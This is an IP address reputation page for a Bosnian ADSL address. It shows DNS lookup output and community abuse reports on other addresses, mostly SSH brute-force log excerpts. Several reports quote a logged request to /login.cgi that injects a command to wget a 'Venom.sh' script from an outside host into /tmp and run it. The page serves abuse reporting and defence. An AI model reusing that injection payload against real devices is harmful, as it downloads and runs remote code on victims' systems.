Must be a valid IPv4 or IPv6 ip address, e.g. 127.0.0.1 or 2001:DB8:0:0:8:800:200C:417A
Basic Info

City: unknown

Region: unknown

Country: Bosnia and Herzegovina

Internet Service Provider: unknown

Hostname: unknown

Organization: unknown

Usage Type: unknown

Comments:
No discussion about this IP yet. Click above link to make one.
Comments on same subnet:
No discussion about this subnet yet..
Whois info:
b
Dig info:
; <<>> DiG 9.10.3-P4-Ubuntu <<>> 212.125.147.204
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34208
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;; QUESTION SECTION:
;212.125.147.204.		IN	A

;; AUTHORITY SECTION:
.			30	IN	SOA	a.root-servers.net. nstld.verisign-grs.com. 2025022800 1800 900 604800 86400

;; Query time: 34 msec
;; SERVER: 183.60.83.19#53(183.60.83.19)
;; WHEN: Fri Feb 28 15:12:18 CST 2025
;; MSG SIZE  rcvd: 108
Host info
204.147.125.212.in-addr.arpa domain name pointer adsl47ht204.tel.net.ba.
Nslookup info:
Server:		183.60.83.19
Address:	183.60.83.19#53

Non-authoritative answer:
204.147.125.212.in-addr.arpa	name = adsl47ht204.tel.net.ba.

Authoritative answers can be found from:
Related IP info:
Related comments:
IP Type Details Datetime
41.42.42.7 attack
1 attack on wget probes like:
41.42.42.7 - - [22/Dec/2019:02:17:46 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 18:01:43
151.84.135.188 attackbotsspam
Dec 23 11:56:56 server sshd\[7569\]: Invalid user git from 151.84.135.188
Dec 23 11:56:56 server sshd\[7569\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=151.84.135.188 
Dec 23 11:56:59 server sshd\[7569\]: Failed password for invalid user git from 151.84.135.188 port 50242 ssh2
Dec 23 12:04:35 server sshd\[9405\]: Invalid user husemoen from 151.84.135.188
Dec 23 12:04:35 server sshd\[9405\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=151.84.135.188 
...
2019-12-23 17:48:38
107.170.192.131 attackspam
$f2bV_matches
2019-12-23 18:04:23
142.93.94.86 attackspam
Dec 22 23:27:42 wbs sshd\[26653\]: Invalid user piranha from 142.93.94.86
Dec 22 23:27:42 wbs sshd\[26653\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.94.86
Dec 22 23:27:44 wbs sshd\[26653\]: Failed password for invalid user piranha from 142.93.94.86 port 49156 ssh2
Dec 22 23:33:38 wbs sshd\[27212\]: Invalid user root3333 from 142.93.94.86
Dec 22 23:33:38 wbs sshd\[27212\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=142.93.94.86
2019-12-23 17:36:15
91.238.248.71 attackbots
1577082496 - 12/23/2019 07:28:16 Host: 91.238.248.71/91.238.248.71 Port: 445 TCP Blocked
2019-12-23 17:28:45
117.144.188.195 attack
SSH Brute Force
2019-12-23 17:52:13
197.53.109.23 attackspam
1 attack on wget probes like:
197.53.109.23 - - [22/Dec/2019:02:34:24 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 17:38:14
103.35.198.219 attackbotsspam
Dec 23 09:45:06 pi sshd\[1171\]: Failed password for invalid user js from 103.35.198.219 port 42213 ssh2
Dec 23 09:52:27 pi sshd\[1589\]: Invalid user dons from 103.35.198.219 port 58926
Dec 23 09:52:27 pi sshd\[1589\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=103.35.198.219
Dec 23 09:52:29 pi sshd\[1589\]: Failed password for invalid user dons from 103.35.198.219 port 58926 ssh2
Dec 23 10:07:46 pi sshd\[2425\]: Invalid user admin from 103.35.198.219 port 6829
...
2019-12-23 18:07:50
156.203.100.167 attack
1 attack on wget probes like:
156.203.100.167 - - [22/Dec/2019:12:41:55 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 18:05:46
51.68.11.211 attackspambots
fail2ban honeypot
2019-12-23 17:40:13
195.72.252.58 attackspam
SQL APT attack
Reported by AND  credit to nic@wlink.biz from IP 118.69.71.82
2019-12-23 18:00:02
39.78.92.84 attackspam
Telnet Server BruteForce Attack
2019-12-23 18:01:56
54.37.19.148 attackspambots
ssh brute force
2019-12-23 17:37:10
197.34.159.60 attackbotsspam
2 attacks on wget probes like:
197.34.159.60 - - [22/Dec/2019:16:14:57 +0000] "GET /login.cgi?cli=aa%20aa%27;wget%20http://185.132.53.119/Venom.sh%20-O%20-%3E%20/tmp/kh;Venom.sh%20/tmp/kh%27$ HTTP/1.1" 400 11
2019-12-23 17:35:43
157.230.163.6 attackbotsspam
Dec 22 23:48:19 php1 sshd\[13066\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.163.6  user=root
Dec 22 23:48:21 php1 sshd\[13066\]: Failed password for root from 157.230.163.6 port 52856 ssh2
Dec 22 23:53:11 php1 sshd\[13517\]: Invalid user server from 157.230.163.6
Dec 22 23:53:11 php1 sshd\[13517\]: pam_unix\(sshd:auth\): authentication failure\; logname= uid=0 euid=0 tty=ssh ruser= rhost=157.230.163.6
Dec 22 23:53:13 php1 sshd\[13517\]: Failed password for invalid user server from 157.230.163.6 port 56254 ssh2
2019-12-23 18:09:30

Recently Reported IPs

87.34.219.196 127.85.158.196 45.230.150.63 78.202.226.117
34.199.130.182 123.255.151.28 230.222.191.23 148.42.162.243
238.48.97.199 81.224.101.84 143.22.137.130 192.82.202.13
17.32.164.55 212.247.93.118 86.249.112.102 219.237.196.175
124.21.247.139 172.193.55.238 246.6.164.112 176.117.198.19